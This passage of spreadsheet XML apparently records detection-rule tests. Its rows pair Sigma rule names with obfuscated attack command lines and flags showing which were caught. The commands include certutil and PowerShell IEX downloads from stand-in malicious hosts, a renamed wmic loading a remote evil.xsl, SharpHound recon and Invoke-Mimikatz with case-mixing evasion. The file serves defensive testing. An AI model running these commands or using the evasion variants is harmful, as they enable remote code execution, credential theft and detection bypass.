          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3309" s="43" t="n"/>
      <c r="J3309" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3309" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3310" ht="15.75" customHeight="1" s="42">
      <c r="A3310" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3310" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3310" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3310" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3310" s="44" t="n"/>
      <c r="J3310" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3310" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3311" ht="15.75" customHeight="1" s="42">
      <c r="A3311" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3311" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3311" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3311" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F3311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3311" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3311" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3311" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3312" ht="15.75" customHeight="1" s="42">
      <c r="A3312" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3312" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3312" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3312" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F3312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3312" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3312" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3313" ht="15.75" customHeight="1" s="42">
      <c r="A3313" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3313" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3313" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3313" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F3313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3313" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3313" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3314" ht="15.75" customHeight="1" s="42">
      <c r="A3314" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3314" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3314" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3314" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F3314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3314" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3314" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3314" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3315" ht="15.75" customHeight="1" s="42">
      <c r="A3315" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3315" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3315" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3315" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F3315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3315" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3315" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3316" ht="15.75" customHeight="1" s="42">
      <c r="A3316" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3316" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3316" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3316" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F3316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3316" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3316" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3316" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3317" ht="15.75" customHeight="1" s="42">
      <c r="A3317" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3317" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3317" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3317" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F3317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3317" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3317" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3318" ht="15.75" customHeight="1" s="42">
      <c r="A3318" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3318" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3318" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3318" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3318" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F3318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3318" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3318" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3318" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3319" ht="15.75" customHeight="1" s="42">
      <c r="A3319" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B3319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3319" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3319" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3319" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F3319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3319" s="44" t="n"/>
      <c r="J3319" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3319" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3320" ht="15.75" customHeight="1" s="42">
      <c r="A3320" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B3320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3320" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3320" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3320" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F3320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3320" s="44" t="n"/>
      <c r="J3320" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3320" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3321" ht="15.75" customHeight="1" s="42">
      <c r="A3321" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B3321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3321" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3321" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3321" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F3321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3321" s="44" t="n"/>
      <c r="J3321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3321" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3322" ht="15.75" customHeight="1" s="42">
      <c r="A3322" s="43" t="n"/>
      <c r="B3322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3322" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3322" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3322" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F3322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3322" s="43" t="n"/>
      <c r="J3322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3322" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3323" ht="15.75" customHeight="1" s="42">
      <c r="A3323" s="43" t="n"/>
      <c r="B3323" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3323" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3323" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3323" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F3323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3323" s="44" t="n"/>
      <c r="J3323" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3323" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3324" ht="15.75" customHeight="1" s="42">
      <c r="A3324" s="43" t="n"/>
      <c r="B3324" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3324" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3324" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3324" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F3324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3324" s="44" t="n"/>
      <c r="J3324" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3324" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3325" ht="15.75" customHeight="1" s="42">
      <c r="A3325" s="43" t="n"/>
      <c r="B3325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3325" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3325" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3325" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332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325" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3325" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3326" ht="15.75" customHeight="1" s="42">
      <c r="A3326" s="43" t="n"/>
      <c r="B3326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3326" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3326" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3326" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332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326" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3326" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3327" ht="15.75" customHeight="1" s="42">
      <c r="A3327" s="43" t="n"/>
      <c r="B3327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3327" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3327" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3327" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332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327" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3327" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3328" ht="15.75" customHeight="1" s="42">
      <c r="A3328" s="43" t="n"/>
      <c r="B3328" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3328" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3328" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3328" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33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328" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3328" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3329" ht="15.75" customHeight="1" s="42">
      <c r="A3329" s="43" t="n"/>
      <c r="B3329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3329" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3329" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3329" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332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329" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3329" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3330" ht="15.75" customHeight="1" s="42">
      <c r="A3330" s="43" t="n"/>
      <c r="B3330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3330" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3330" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3330" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I333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330" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3330" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3331" ht="15.75" customHeight="1" s="42">
      <c r="A3331" s="43" t="n"/>
      <c r="B3331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3331" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3331" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3331" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3331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331" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3331" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3332" ht="15.75" customHeight="1" s="42">
      <c r="A3332" s="43" t="n"/>
      <c r="B3332" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3332" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3332" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3332" s="44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3332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3332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3332" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3333" ht="15.75" customHeight="1" s="42">
      <c r="A3333" s="43" t="n"/>
      <c r="B3333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3333" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3333" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3333" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F3333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3333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3333" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3334" ht="15.75" customHeight="1" s="42">
      <c r="A3334" s="43" t="n"/>
      <c r="B3334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3334" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3334" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3334" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nONInteRAcTIvE -exeCUtiOnpoLICy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F3334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3334" s="44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3334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3334" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3335" ht="15.75" customHeight="1" s="42">
      <c r="A3335" s="43" t="n"/>
      <c r="B3335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3335" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3335" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3335" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3335" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3335" s="44" t="inlineStr">
        <is>
